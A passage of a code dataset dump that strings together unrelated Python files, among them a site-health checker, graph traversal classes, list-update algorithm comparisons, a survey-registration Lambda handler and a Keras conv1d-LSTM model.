print('Checking site: %s' % url)\n print('Site is: {0}'.format('Available' if status else 'Offline'))\n if expiration_date:\n print('Domain expiration date: {0}'.format(expiration_date.strftime('%Y-%m-%d')))\n if need_extend:\n print('Domain {0} expires in less than one month'.format(url))\n else:\n print('Domain {0} paid more then one month'.format(url))\n else:\n print('Domain {0} now free for registration.'.format(url))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Get most frequent words\")\n parser.add_argument(\"-p\", \"--path\", type=str, dest=\"filepath\", required=True)\n options = parser.parse_args()\n urls = load_urls4check(options.filepath)\n for url in urls:\n status = is_server_respond_with_200(url)\n expiration_date = get_domain_expiration_date(url)\n need_extend = not is_paid_more_then_month(expiration_date)\n pretty_print_check(url, expiration_date, status, need_extend)\n","sub_path":"check_sites_health.py","file_name":"check_sites_health.py","file_ext":"py","file_size_in_byte":2045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"196187901","text":"from decoder.field import BasicField, WireField, ComputedField, RepeatingGroup, TrimmedString, HexArray\nfrom decoder.descriptor import Descriptor\n\nfrom decoder.decoder import Decoder, Verbosity\n\n\nclass Decoder (Decoder):\n \"\"\" SeqFwdCpp decoder\n\n This decoder processes SeqFwdCpp\n\n \"\"\"\n\n def __parse_options (self, opts):\n pass\n\n def __init__ (self, opts, next_decoder):\n super (Decoder, self).__init__ ('spry/seqfwd-java', opts, next_decoder)\n self.__parse_options (opts)\n # init summary data\n self.__frame_sequence = 0\n self.__decodingErrors = 0\n self.__unhandled_messages = {}\n self.__msg_counts = {}\n\n # init message segment descriptors\n self.__segmentDescriptors = {}\n self.__segmentDescriptors['SeqFwdJava'] = Descriptor ([\n WireField ('seqfwd-source-id', 'I', type=long),\n WireField ('seqfwd-seq-num', 'I', type=long),\n WireField ('seqfwd-unscaled-bid', 'I', type=long),\n WireField ('seqfwd-bid-scale', 'I', type=long),\n WireField ('seqfwd-bid-size', 'I', type=long),\n WireField ('seqfwd-unscaled-ask', 'I', type=long),\n WireField ('seqfwd-ask-scale', 'I', type=long),\n WireField ('seqfwd-ask-size', 'I', type=long),\n WireField ('seqfwd-symbol', '12s', type=TrimmedString),\n WireField ('seqfwd-market', '4s', type=TrimmedString)\n\n ])\n\n\n # Init message detail dict:q\n \n import string\n\n ltrs = string.uppercase\n\n def on_message (self, inputContext, payload):\n \"\"\" Process CTA Packet\n\n :rtype : none\n :param context: Message context build by preceding link in decoder chain\n :param payload: Message payload\n \"\"\"\n\n self.__frame_sequence += 1\n\n # parse the message payload\n msgDescriptors = self.__segmentDescriptors['SeqFwdJava']\n if msgDescriptors:\n # decode non-empty payloads\n decodedMessages, remainingPayload = self.decode_segment (msgDescriptors, payload)\n\n # pass context & remaining payload to next link in decoder chain\n if decodedMessages:\n for decoded in decodedMessages:\n decoded.update ({\n 'seqfwd-msg-type-name': 'SeqFwdJava',\n 'sequence-number': decoded['seqfwd-seq-num']})\n\n decoded.update (inputContext)\n self.dispatch_to_next (decoded, remainingPayload)\n\n\n def summarize (self):\n \"\"\" Provides summary statistics from this Decoder\n \"\"\"\n return {\n 'UnhandledMsgTypeCodes': self.__unhandled_messages,\n 'TotalFramesReceived': self.__frame_sequence,\n 'MsgTypeCounts': self.__msg_counts\n }\n\n\n","sub_path":"decoder/spry/seqfwd_java.py","file_name":"seqfwd_java.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"288003037","text":"import requests\nimport json\nimport datetime\nimport time\nfrom pymongo import MongoClient\n\ndefault_retries = 5\ndefault_wait = 30 # 30 seconds\nsucceeds = False\nretries = 0\n\n# Mongo client\nclient = MongoClient('mongodb', 27017)\n\ndef wait_and_retry():\n global retries\n retries += 1\n print(\"retrying in %d seconds...\" % default_wait)\n time.sleep(default_wait)\n\nwhile not succeeds and retries < default_retries:\n # Request top 10 criptocoin\n url = 'https://api.coinmarketcap.com/v1/ticker/?limit=10'\n print(\"Requesting...\", datetime.datetime.now())\n try:\n r = requests.get(url)\n\n coins = json.loads(r.content)\n\n # Include time\n for coin in coins:\n coin[\"date\"] = datetime.datetime.now()\n\n # Insert on mongo\n db = client['criptocoins']\n succeeds = db.coinmarketcap.insert_many(coins).acknowledged\n if not succeeds:\n wait_and_retry()\n except:\n print(\"fail on fetch (%s)\" % datetime.datetime.now())\n wait_and_retry()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"259244251","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: liuchang\n@software: PyCharm\n@file: list.py\n@time: 2020-01-28 14:11\n'''\nmultiples = [i for i in range(30) if i % 3 is 0]\nprint(multiples)\n\nsquared = []\nfor x in range(10):\n squared.append(x**2)\nprint(squared)","sub_path":"Comprehensions/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"39399918","text":"import requests\nimport pandas as pd\n\nheader = {'User-Agent': 'api-test-agent'}\nframe = pd.read_csv('file.csv', sep=',')\nser_salary_from = pd.Series([])\n\ndef get_info_salary(num_id):\n url = 'https://api.hh.ru/vacancies/' + str(num_id)\n request = requests.get(url, headers=header)\n if request.status_code == 200:\n try:\n salary_from = request.json()['salary']['from']\n except Exception:\n salary_from = -1\n\n else:\n print('ERROR')\n print('STATUS = ' + str(request.status_code))\n\n return salary_from\n\nfor i in range(0, len(frame)):\n print(i)\n ser_salary_from = ser_salary_from.append(pd.Series(get_info_salary(frame['id'][i])), ignore_index = True)\n\nframe.loc[:, 'salary_from'] = ser_salary_from\nframe.to_csv('file_id.csv')","sub_path":"load_salary.py","file_name":"load_salary.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"168233030","text":"#!/usr/bin/env python3\nimport argparse, os, subprocess, glob, math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(3)\n[h, w] = fig.get_size_inches()\nfig.set_figheight(h*1.5)\nfig.set_figwidth(w*1.5)\ncol = ['blue', 'red', 'green', 'orange']\ni=0\nfs=14\nfor protein in [ '2k57', 'ub', '2kim']:\n i=i+1\n plt.subplot(3,1,i) \n c=-1\n for n in [1, 2, 4, 8]:\n c=c+1 \n file = \"../RESULTS/%s/%s%s_order_parameter.xvg\" % (protein, protein, str(n))\n v =[]\n with open(file, 'r') as infile:\n for line in infile:\n line = line.strip('\\n')\n line = line.replace('[', '').replace(']', '').replace(',','')\n for e in line.split(' '):\n if e !='':\n v.append(float(e))\n l = len(v[0: int(len(v)/2)])\n plt.subplot(3,1,i)\n plt.plot(np.arange(1, l), np.array(v[0:l-1])**2, color=col[c], label=str(n))\n plt.fill_between(np.arange(1, l), np.array(v[0:l-1])**2 - np.array(v[l:-1])**2 , np.array(v[0:l-1])**2 + np.array(v[l:-1])**2 , color = col[c], alpha=0.5)\n if i == 1:\n plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0., fontsize=fs) \n plt.text(56, 0.9, 'A', fontsize=fs)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n if i == 2:\n plt.text(78, 0.9, 'B', fontsize=fs)\n plt.ylabel('$S^2$', fontsize=fs+4)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n if i == 3:\n plt.text(104, 0.9, 'C', fontsize=fs)\n plt.yticks(fontsize=fs)\n plt.xticks(fontsize=fs)\n plt.xlabel('Residue', fontsize=fs)\n\nplt.savefig('../fig_S2.pdf', bbox_inches=\"tight\")\n\n\n# plt.xticks(fontsize=LG_FONTSIZE)\n# plt.yticks(fontsize=LG_FONTSIZE)\n# if i == 0:\n# plt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3, ncol=4, mode=\"expand\", borderaxespad=0., fontsize=LG_FONTSIZE) \n# plt.text(58, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# if i == 1:\n# plt.ylabel('$S^2$', fontsize=LBL_FONTSIZE)\n# plt.text(80, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# if i == 2:\n# plt.xlabel('Residue', fontsize=LBL_FONTSIZE)\n# plt.text(107, .8, CPT[i], fontsize=CPT_FONTSIZE)\n# plt.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=None, hspace=0.5)\n# plt.savefig('../fig_S2.pdf', bbox_inches='tight')\n\n\n\n","sub_path":"internal_order_parameter.py","file_name":"internal_order_parameter.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"251987207","text":"# _*_ coding: utf-8 _*_\n\"\"\"\n Created by Allen7D on 2019/10/25.\n\"\"\"\nfrom flask import Blueprint as _Blueprint\n\n__author__ = 'Allen7D'\n\n\nclass Blueprint(_Blueprint):\n\n def __init__(self, name, import_name, static_folder=None,\n static_url_path=None, template_folder=None,\n url_prefix=None, subdomain=None, url_defaults=None,\n root_path=None):\n super(Blueprint, self).__init__(name, import_name, static_folder,\n static_url_path, template_folder,\n url_prefix, subdomain, url_defaults,\n root_path)\n\n def register_redprint_list(self, rp_list):\n for api in rp_list:\n api.register(self)\n return self\n","sub_path":"app/libs/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"52084933","text":"def dfs(graph):\n vertices = graph.keys()\n visited = set()\n\n clock = {}\n for vertex in vertices:\n clock[vertex] = []\n\n ticktock = [0]\n count = 0\n linearization_seq = []\n for vertex in vertices:\n if vertex not in visited:\n visited.add(vertex)\n explore(graph, vertex, visited, ticktock, clock, linearization_seq)\n count += 1\n\n print(\"Number of dfs calls=\", count)\n '''\n In a directed graph the number of explore calls depends on the \n \n '''\n\n\n\n print(\"clock = \", clock)\n\n\n linearization(linearization_seq)\n\ndef linearization(linearization_seq):\n print(linearization_seq)\n\n\n\ndef explore(graph, vertex, visited, ticktock, clock, linearization_seq):\n previsit(vertex, ticktock, clock)\n\n for node in graph[vertex]:\n if node not in visited:\n visited.add(node)\n explore(graph, node, visited, ticktock, clock, linearization_seq)\n postvisit(vertex, ticktock, clock, linearization_seq)\n\n\ndef previsit(node, ticktock, clock):\n clock[node].append(ticktock[0])\n ticktock[0] += 1\n print(\"PREVISIT: \", node)\n\n\ndef postvisit(node, ticktock, clock, linearization_seq):\n clock[node].append(ticktock[0])\n linearization_seq.append(clock[node])\n ticktock[0] += 1\n\n print(\"POSTVISIT: \", node)\n\n\n\n# Fig 3.8 page 101 papadimitrov. Connected acyclic graph directed\ngraph1 = {\n 'A': set(['C']),\n 'B': set(['A', 'D']),\n 'C': set(['E', 'F']),\n 'D': set(['C']),\n 'E': set([]),\n 'F': set([])\n\n}\n\n# Fig 3.4 page 99 papadimitrov. Not connected directed graph\ngraph2 = {\n 'A': set(['B', 'C', 'F']),\n 'B': set(['E']),\n 'C': set(['D']),\n 'D': set(['A', 'H']),\n 'E': set(['F', 'G', 'H']),\n 'F': set(['B', 'G']),\n 'G': set([]),\n 'H': set(['G'])\n}\n\ndfs(graph1)\n","sub_path":"Archive/P/Graphs/graphs_revision2/9_linearization_directed.py","file_name":"9_linearization_directed.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"367868151","text":"import requests\n\nheaders = {\n 'Authorization': 'Bearer ACCESS_TOKEN',\n}\n\ndomain = 'https://drchrono.com'\n\npatients = []\npatients_url = '/api/patients'\nwhile patients_url:\n data = requests.get(domain + patients_url, headers=headers).json()\n patients.extend(data['results'])\n patients_url = data['next'] # A JSON null on the last page\n","sub_path":"list_users.py","file_name":"list_users.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"286577414","text":"import copy\nimport random\n\n#read the file and remove the space\nfile = open('input.txt','r')\nS = file.read()\nL = S.split(' ')\nS = ''.join(L)\nfile.close\n#the original list of x1 x2 x3 .... xn\nOri_L = [0,1,2,3,4,5,6,7,8,9]\n#######################################################################\n#Optimal (Clear)\nOP_L = copy.deepcopy(Ori_L)\ntimes = [0,0,0,0,0,0,0,0,0,0]\nOP_result = []\nfor word in S:\n times[int(word)] += 1\nfor i in range(0,10):\n M = max(times)\n OP_L[i] = times.index(M)\n times[times.index(M)] = -1\n#calculate the different term\nfor terms in range(50,1001,50):\n total_count = 0\n for word in range(0,terms):\n counter = 0\n while True:\n if int(S[word]) == OP_L[counter]:\n counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n OP_result.append(total_count)\nprint('Optimal: ',OP_result)\n#######################################################################\n#MTF (Clear)\ndef move_to_front(L,index):\n '''move the element to the front(index = 0)'''\n if index == 0:\n return None\n temp = L.pop(index)\n L.insert(0,temp)\nMTF_result = []\n \nfor terms in range(50,1001,50):\n MTF_L = copy.deepcopy(Ori_L)\n total_count = 0\n for word in range(0,terms):\n counter = 0\n while True:\n if int(S[word]) == MTF_L[counter]:\n move_to_front(MTF_L,counter)\n counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n MTF_result.append(total_count)\nprint('MTF: ',MTF_result)\n#######################################################################\n#bit (Clear)\ndef init_bit(L):\n '''initialize the list of bit to each number'''\n for i in range(0,10):\n L[i] = random.randint(0,1)\n return L\nBIT_L = copy.deepcopy(Ori_L)\nbit = [0,0,0,0,0,0,0,0,0,0]\nbit = init_bit(bit)\nINIT_bit = bit\nBIT_result = [] \n\nfor terms in range(50,1001,50):\n BIT_L = copy.deepcopy(Ori_L)\n bit = INIT_bit\n total_count = 0\n for word in range(0,terms):\n counter = 0\n while True:\n if int(S[word]) == BIT_L[counter]:\n if bit[counter] == 1:\n bit[counter] = 0\n counter += 1\n total_count += counter\n break\n else:\n bit[counter] = 1\n move_to_front(BIT_L,counter)\n move_to_front(bit,counter)\n counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n BIT_result.append(total_count)\nprint('BIT: ',BIT_result)\nprint(INIT_bit)\n#######################################################################\n#transpose (Clear)\ndef transpose(L,index):\n '''function to change elements in L[index] and L[index - 1] '''\n if index == 0:\n return None\n temp = L[index - 1]\n L[index - 1] = L[index]\n L[index] = temp\nT_result = []\n\nfor terms in range(50,1001,50):\n T_L = copy.deepcopy(Ori_L)\n total_count = 0\n for word in range(0,terms):\n counter = 0\n while True:\n if int(S[word]) == T_L[counter]:\n transpose(T_L,counter)\n counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n T_result.append(total_count)\nprint('Transpose: ',T_result)\n#######################################################################\n#frequency count (Clear)\ndef rearrange(number_L,frequency,index):\n '''according to the frequency to rearrange the List'''\n if index == 0:\n return None\n for i in range(index-1,-1,-1):\n if frequency[i] < frequency[i + 1]:\n temp = frequency[i]\n frequency[i] = frequency[i + 1]\n frequency[i + 1] = temp\n temp = number_L[i]\n number_L[i] = number_L[i + 1]\n number_L[i + 1] = temp\nFC_result = []\n\nfor terms in range(50,1001,50):\n MAX = 0\n FC_L = copy.deepcopy(Ori_L)\n access_frequency = [0,0,0,0,0,0,0,0,0,0]\n total_count = 0\n for word in range(0,terms):\n counter = 0\n while True:\n if int(S[word]) == FC_L[counter]:\n access_frequency[counter] += 1\n rearrange(FC_L,access_frequency,counter)\n counter += 1\n total_count += counter\n break\n else:\n counter += 1\n continue\n FC_result.append(total_count)\nprint('frequency count: ',FC_result)\n#######################################################################\n#write result into file\nfile = open('output.txt','w')\n\nfile.write('Optimal:\\n')\nfor elem in OP_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('MTF:\\n')\nfor elem in MTF_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('Transpose:\\n')\nfor elem in T_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('BIT:\\n')\nfor elem in INIT_bit:\n file.write(str(elem))\nfile.write('\\n')\nfor elem in BIT_result:\n file.write(str(elem))\n file.write('\\n')\nfile.write('FC:\\n')\nfor elem in FC_result:\n file.write(str(elem))\n file.write('\\n')\nfile.close()","sub_path":"Prog1/Prog1.py","file_name":"Prog1.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"175159339","text":"# importing required modules \nimport matplotlib.pyplot as plt \nimport matplotlib.animation as animation \nimport numpy as np \n\n# create a figure, axis and plot element \nfig = plt.figure() \nax = plt.axes(xlim=(-25, 25), ylim=(-25, 25)) \nline, = ax.plot([], [], lw=2) \n\n# initialization function \ndef init(): \n\t# creating an empty plot/frame \n\tline.set_data([], []) \n\treturn line, \n\n# set of points for a star (could be any curve) \np = np.arange(0, 4*np.pi, 0.1) \nx = 12*np.cos(p) + 8*np.cos(1.5*p) \ny = 12*np.sin(p) - 8*np.sin(1.5*p) \n\n# animation function \ndef animate(i): \n\t# t is a parameter \n\tt = 0.1*i \n\t\n\t# x, y values to be plotted \n\tX = x*np.cos(t) - y*np.sin(t) \n\tY = y*np.cos(t) + x*np.sin(t) \n\t\n\t# set/update the x and y axes data \n\tline.set_data(X, Y) \n\t\n\t# return line object \n\treturn line, \n\t\n# setting a title for the plot \nplt.title('A rotating star!') \n# hiding the axis details \nplt.axis('off') \n\n# call the animator\t \nanim = animation.FuncAnimation(fig, animate, init_func=init, \n\t\t\t\t\t\t\tframes=100, interval=100, blit=True) \n\n# save the animation as mp4 video file \nanim.save('basic_animation.mp4', writer = 'ffmpeg', fps = 10) \n\n# show the plot \nplt.show() \n\n","sub_path":"graphs-in-py/3d_rotor.py","file_name":"3d_rotor.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"386625706","text":"import json\nimport traceback\n\nfrom goldfnd.lib.database import Database\nfrom goldfnd.lib.serverless import with_lambda_response\nfrom goldfnd.models.SendingSchedule import SendingSchedule\nfrom goldfnd.models.SurveyAnswerRule import SurveyAnswerRule\nfrom goldfnd.models.SurveyHistory import SurveyHistory\nfrom goldfnd.models.SurveyQuestion import SurveyQuestion\nfrom goldfnd.models.SurveyResponse import SurveyResponse\nfrom goldfnd.models.User import User\n\n\ndef get_answer_combination(answers, flagged_questions):\n question_ids = [question.id for question in flagged_questions]\n necessary_answers = []\n for answer in answers:\n if int(answer['survey_question_id']) in question_ids:\n necessary_answers.append(int(answer['survey_answer_id']))\n\n sorted_answers = [str(i) for i in list(sorted(necessary_answers))]\n return ''.join(sorted_answers)\n\n\n@with_lambda_response\ndef main(event, context):\n try:\n try:\n form_data = json.loads(event['body'])\n except TypeError:\n form_data = event['body']\n\n # register new user\n print(form_data)\n survey_id = form_data.get('survey_id')\n\n user_data = form_data.get('user_data')\n answers = form_data.get('answers')\n database = Database()\n\n # get proper reply_id\n new_user = User.add_user(database.session, user_data)\n flagged_questions = SurveyQuestion.get_flagged_questions(database.session)\n combination = get_answer_combination(answers, flagged_questions)\n reply_id = SurveyAnswerRule.find_proper_reply_id(database.session, combination)\n\n # register survey history\n new_survey_history = SurveyHistory.register(database.session, survey_id, new_user.id, reply_id)\n\n # register survey response\n inserted_row_count = SurveyResponse.register(database.session, survey_id, new_user.id, new_survey_history.id,\n answers)\n\n # setting up sending schedule\n new_schedule = SendingSchedule.register(database.session, new_user.id, reply_id)\n if not new_schedule:\n print('Message is already scheduled')\n\n if new_user:\n return {\n 'user_id': new_user.id,\n 'reply_id': reply_id,\n 'survey_history_id': new_survey_history.to_dict(),\n 'inserted_survey_response': inserted_row_count,\n 'will_send': new_schedule and new_schedule.reply_when or None\n }\n else:\n return {'message': 'FAILED'}, 500\n\n except Exception:\n traceback.print_exc()\n return {'message': 'FAILED'}, 500\n","sub_path":"goldfnd/functions/survey/register.py","file_name":"register.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"218426342","text":"\"\"\"\nValid Palindrome\n\nA phrase is a palindrome if, after converting all uppercase letters into lowercase letters and removing all non-alphanumeric characters, it reads the same forward and backward. Alphanumeric characters include letters and numbers.\n\nGiven a string s, return true if it is a palindrome, or false otherwise.\n\nnput: s = \"A man, a plan, a canal: Panama\"\nOutput: true\nExplanation: \"amanaplanacanalpanama\" is a palindrome.\n\nInput: s = \"race a car\"\nOutput: false\nExplanation: \"raceacar\" is not a palindrome.\n\nInput: s = \" \"\nOutput: true\nExplanation: s is an empty string \"\" after removing non-alphanumeric characters.\nSince an empty string reads the same forward and backward, it is a palindrome.\n\"\"\"\n\ndef isValid(s: str) -> bool:\n res = []\n for ch in s:\n if ch.isalnum():\n res.append(ch.lower())\n \n i, j = 0, len(res)-1\n while i < j:\n if res[i] != res[j]:\n return False\n i += 1\n j -= 1\n return True\n\nprint(isValid(\"A man, a plan, a canal: Panama\"))\nprint(isValid(\"race a car\"))\nprint(isValid(\" \"))","sub_path":"valid_palindrome.py","file_name":"valid_palindrome.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502203812","text":"# ---------------------- PROBLEM 48 (RANDOM) ----------------------------------#\n# A Graph is a non-linear data structure consisting of nodes and edges. \n# The nodes are sometimes also referred to as vertices and the edges are lines or \n# arcs that connect any two nodes in the graph.\n# USES: Social Networks, Location/ Mapping, Routing Algos, Visual Hierarchy, File System Oraganizations.\nclass Graph:\n\tdef __init__(self):\n\t\tself.adjacencyList = {}\n\n# ----------------METHOD 01---------------------#\n\t# COMPLEXITY = TIME: O(1), SPACE: O(|V| + |E|)\n\tdef addVertex(self, vertex_name):\n\t\tif vertex_name not in self.adjacencyList:\n\t\t\tself.adjacencyList[vertex_name] = []\n\t\treturn self.adjacencyList\n# ----------------METHOD 01---------------------#\n\n# ----------------METHOD 02---------------------#\n\t# COMPLEXITY = TIME: O(1), SPACE: O(|V| + |E|)\n\tdef addEdge(self, vertex1, vertex2):\n\t\tself.adjacencyList[vertex1].append(vertex2)\n\t\tself.adjacencyList[vertex2].append(vertex1)\n\t\treturn self.adjacencyList\n# ----------------METHOD 02---------------------#\n\n# ----------------METHOD 03---------------------#\n\t# COMPLEXITY = TIME: O(E), SPACE: O(1)\n\tdef removeEdge(self, vertex1, vertex2):\n\t\tself.adjacencyList[vertex1].remove(vertex2)\n\t\tself.adjacencyList[vertex2].remove(vertex1)\n\t\treturn self.adjacencyList\n# ----------------METHOD 03---------------------#\n\n# ----------------METHOD 04---------------------#\n\t# COMPLEXITY = TIME: O(|V| + |E|), SPACE: O(1)\n\tdef removeVertex(self, vertex2):\n\t\tlst = self.adjacencyList[vertex2].copy()\n\t\tfor vertex1 in lst:\n\t\t\tself.removeEdge(vertex1, vertex2)\n\t\tdel self.adjacencyList[vertex2]\n\t\treturn self.adjacencyList\n# ----------------METHOD 04---------------------#\n\n# ----------------METHOD 05---------------------#\n\n\tdef DFSRecursive(self, vertex, results = []):\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\t\tresults.append(vertex)\n\t\tfor vert in self.adjacencyList[vertex]:\n\t\t\tif vert not in results:\n\t\t\t\tself.DFSRecursive(vert, results)\n\t\treturn results\n\n# ----------------METHOD 05---------------------#\n\n# ----------------METHOD 06---------------------#\n\n\tdef DFSIterative(self, vertex):\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\t\tstacks = []\n\t\tresults = []\n\t\tstacks.append(vertex)\n\t\twhile len(stacks) != 0:\n\t\t\tnode = stacks.pop()\n\t\t\tresults.append(node)\n\t\t\tfor vert in lst[node]:\n\t\t\t\tif vert not in results and vert not in stacks:\n\t\t\t\t\tstacks.append(vert)\n\t\treturn results\n\n# ----------------METHOD 06---------------------#\n\n# ----------------METHOD 07---------------------#\n\n\tdef BFSIterative(self, vertex):\n\t\tlst = self.adjacencyList\n\t\tif lst[vertex] is None: return None\n\n\t\tresults = []\n\t\tqueue = [vertex]\n\t\twhile len(queue) != 0:\n\t\t\tnode = queue.pop(0)\n\t\t\tresults.append(node)\n\t\t\tfor vert in lst[node]:\n\t\t\t\tif vert not in queue and vert not in results:\n\t\t\t\t\tqueue.append(vert)\n\t\treturn results\t\t\t\t\t\n\n# ----------------METHOD 07---------------------#\n\n# ----------------Weighted Graph---------------------#\nclass WeightedGraph:\n\tdef __init__(self):\n\t\tself.adjacencyList = {}\n\n# ----------------METHOD 01---------------------#\n\t\n\tdef addVertex(self, vertex_name):\n\t\tif vertex_name not in self.adjacencyList:\n\t\t\tself.adjacencyList[vertex_name] = []\n\t\treturn self.adjacencyList\n\n# ----------------METHOD 01---------------------#\n\n# ----------------METHOD 02---------------------#\n\t\n\tdef addEdge(self, vertex1, vertex2, weight):\n\t\tself.adjacencyList[vertex1].append({\"node\":vertex2, \"weight\": weight})\n\t\tself.adjacencyList[vertex2].append({\"node\":vertex1, \"weight\": weight})\n\t\treturn self.adjacencyList\n\n# ----------------METHOD 02---------------------#\nprint('****************************')\n\n\ngraph_rec = Graph()\ngraph_rec.addVertex('A')\ngraph_rec.addVertex('B')\ngraph_rec.addVertex('C')\ngraph_rec.addVertex('D')\ngraph_rec.addVertex('E')\ngraph_rec.addVertex('F')\ngraph_rec.addEdge('A', 'B')\ngraph_rec.addEdge('A', 'C')\ngraph_rec.addEdge('B', 'D')\ngraph_rec.addEdge('C', 'E')\ngraph_rec.addEdge('D', 'E')\ngraph_rec.addEdge('D', 'F')\nprint(graph_rec.addEdge('F', 'E'))\nprint(graph_rec.DFSRecursive('A')) # ['A', 'B', 'D', 'E', 'C', 'F']\nprint(graph_rec.DFSIterative('A')) # ['A', 'C', 'E', 'F', 'D', 'B']\nprint(graph_rec.BFSIterative('B')) # ['B', 'A', 'D', 'C', 'E', 'F']\n\nweightedGraph = WeightedGraph()\nweightedGraph.addVertex(\"A\")\nweightedGraph.addVertex(\"B\")\nweightedGraph.addVertex(\"C\")\nprint(weightedGraph.addEdge(\"A\", \"B\", 250)) # {'A': [{'node': 'B', 'weight': 250}], 'B': [{'node': 'A', 'weight': 250}], 'C': []}\nprint(weightedGraph.addEdge(\"C\", \"B\", 30)) # {'A': [{'node': 'B', 'weight': 250}], 'B': [{'node': 'A', 'weight': 250}, {'node': 'C', 'weight': 30}], 'C': [{'node': 'B', 'weight': 30}]}","sub_path":"47_Practice/48_Graph_Traversal/GraphTraversal.py","file_name":"GraphTraversal.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"25367815","text":"from typing import Dict\n\nimport torch\n\nfrom kwja.metrics.base import BaseModuleMetric\nfrom kwja.metrics.utils import unique\n\n\nclass Seq2SeqModuleMetric(BaseModuleMetric):\n STATE_NAMES = (\n \"example_ids\",\n \"loss\",\n )\n\n def __init__(self):\n super().__init__()\n\n self.example_ids: torch.Tensor\n self.loss: torch.Tensor\n\n def compute(self) -> Dict[str, float]:\n sorted_indices = unique(self.example_ids)\n for state_name in self.STATE_NAMES:\n state = getattr(self, state_name)\n if state_name != \"loss\":\n setattr(self, state_name, state[sorted_indices])\n\n metrics: Dict[str, float] = {\n \"seq2seq_loss\": self.loss.mean().item(),\n }\n return metrics\n","sub_path":"src/kwja/metrics/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296411299","text":"'''\nNew conv1d + LSTM model for mfcc40 features\nCreated on December 9, 2020 at 1100\nhttps://github.com/vandana-rajan/1D-Speech-Emotion-Recognition/blob/master/cnn1d.py\n'''\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Input\nfrom tensorflow.keras.layers import Activation, BatchNormalization\nfrom tensorflow.keras.layers import Conv1D, Conv2D, LSTM\nfrom tensorflow.keras.layers import AveragePooling1D, GlobalAveragePooling2D, MaxPooling1D\nfrom tensorflow.keras.models import Model, model_from_json, Sequential\n\ndef conv1d_lstm(input_shape):\n \n learning_rate = 0.0001\n decay = 1e-6\n momentum = 0.9\n num_classes=3\n num_fc = 64\n \n model = Sequential(name='conv1d_lstm')\n \n # LFLB1\n model.add(Conv1D(filters = 64,kernel_size = (3),strides=1,padding='same',data_format='channels_last',input_shape=input_shape))\t\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB2\n model.add(Conv1D(filters=64, kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB3\n model.add(Conv1D(filters=128, kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LFLB4\n model.add(Conv1D(filters=128, kernel_size = 3, strides=1,padding='same'))\n model.add(BatchNormalization())\n model.add(Activation('elu'))\n model.add(MaxPooling1D(pool_size = 4, strides = 4))\n\n #LSTM\n model.add(LSTM(units=num_fc)) \n\n #FC\n model.add(Dense(units=num_classes,activation='softmax'))\n\n #Model compilation\t\n opt = tf.keras.optimizers.SGD(lr = learning_rate, decay=decay, momentum=momentum, nesterov=True)\n 